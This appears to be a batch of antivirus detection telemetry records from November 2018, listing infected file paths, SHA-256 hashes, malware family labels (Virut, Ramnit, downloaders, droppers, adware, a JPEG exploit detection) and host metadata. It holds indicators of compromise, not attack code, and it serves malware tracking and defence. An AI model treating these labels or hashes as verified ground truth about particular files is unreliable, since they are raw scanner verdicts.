  Row(detection=Row(filename='flame painter.exe', filepath='D:\\#BIG电脑文件\\D\\BIG\\资料收集\\FLAME PAINTER.EXE', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675784, timestamp='2018-11-02T02:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flame painter.exe', filepath='D:\\#BIG电脑文件\\D\\BIG\\资料收集\\FLAME PAINTER.EXE', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675784, timestamp='2018-11-02T02:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105542-51d6e492', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-105526-4F443796\\AVSCAN-20181102-105542-51D6E492', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flame painter.exe', filepath='D:\\#BIG电脑文件\\D\\BIG\\资料收集\\FLAME PAINTER.EXE', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675784, timestamp='2018-11-02T02:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104638-f8fab695', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-104622-F63B0CE0\\AVSCAN-20181102-104638-F8FAB695', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:46:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103856-ad705d01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-103841-AAE884CC\\AVSCAN-20181102-103856-AD705D01', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:39:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='24b98a8d2032b474a2f994abbd2ef8a7acfdc243c58302e6ddc871a98deaa322', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chiaotzu.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Chiaotzu\\Chiaotzu.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24cc76317362660a7ca0b1203fcb10e4d9b4e230f77b6fcc345f49025aa26829', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chars.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\chars.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24cc76317362660a7ca0b1203fcb10e4d9b4e230f77b6fcc345f49025aa26829', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\24DABBE3279F895D09D49475F6A79EB854ECC6C488038E22A9B5171DD4D069AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\24DABBE3279F895D09D49475F6A79EB854ECC6C488038E22A9B5171DD4D069AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='arh.exe', filepath='C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\arh.exe', filesize=320000, name='W32/Jaik.mad.#M1.#R1'), hash='251dc70a463f8ac1b3e862673a4fe5c12b43f7fab6a5a6b4093f3a3dff78ab16', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:06:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\Documents\\AT launcher\\Instances\\PixelmonCraft\\bin\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='258563a4fd300e5e2a1752923de7286886ffc712d7c6a4f523a34ba2bcd4cdc6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T17:02:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='animtrigger.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\animtrigger\\animtrigger.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='556.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\556\\556.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='127.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\127\\127.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='357.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\357\\357.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ammo.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\AMMO.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMMON\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='44.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\44\\44.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1000.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\1000\\1000.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grenade.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\GRENADE\\GRENADE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashbang.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\FLASHBANG\\FLASHBANG.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='12.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\12\\12.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='proximitymine.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\PROXIMITYMINE\\PROXIMITYMINE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='919.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\919\\919.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dragunov.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\DRAGUNOV\\DRAGUNOV.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='762.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\762\\762.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8ee1ae3b9eb955597095fd702bef4fce9f447068', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ee1ae3b9eb955597095fd702bef4fce9f447068', filesize=2112000, name='Adware/DealPly.25a0a4.#M1.#R1'), hash='25a0a400f0303d8f77edadd093db30413123768cb66a957616dafe58f8d9b416', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:45:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8ee1ae3b9eb955597095fd702bef4fce9f447068', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ee1ae3b9eb955597095fd702bef4fce9f447068', filesize=2112000, name='Adware/DealPly.25a0a4.#M1.#R1'), hash='25a0a400f0303d8f77edadd093db30413123768cb66a957616dafe58f8d9b416', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:40:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8ee1ae3b9eb955597095fd702bef4fce9f447068', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8ee1ae3b9eb955597095fd702bef4fce9f447068', filesize=2112000, name='Adware/DealPly.25a0a4.#M1.#R1'), hash='25a0a400f0303d8f77edadd093db30413123768cb66a957616dafe58f8d9b416', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered donad', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered donad', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='25d15dfae56e82fc98d308f15accee6c3d6dbc5e04c9a7dab5fa50c57e75ded5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0005950.exe', filepath='D:\\System Volume Information\\_restore{6B806EF6-C686-49F4-AC4B-5CBDA4B84782}\\RP14\\A0005950.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='25f2073a107d9bee4ebb66c4d4445b53588a4e3a1b2b99d050eed5a948931551', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:45:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='25fcedda7822f68d0d8d335f6dbb38cf462cecec6601d640725e44c676432602', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='261a2382fa82e428efc26f72c5a59cbbb78e34b82b0156611d28b6066a424608', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:05:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='261a2382fa82e428efc26f72c5a59cbbb78e34b82b0156611d28b6066a424608', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:48:53Z'), dt=datetime.date(2018, 11, 2)),
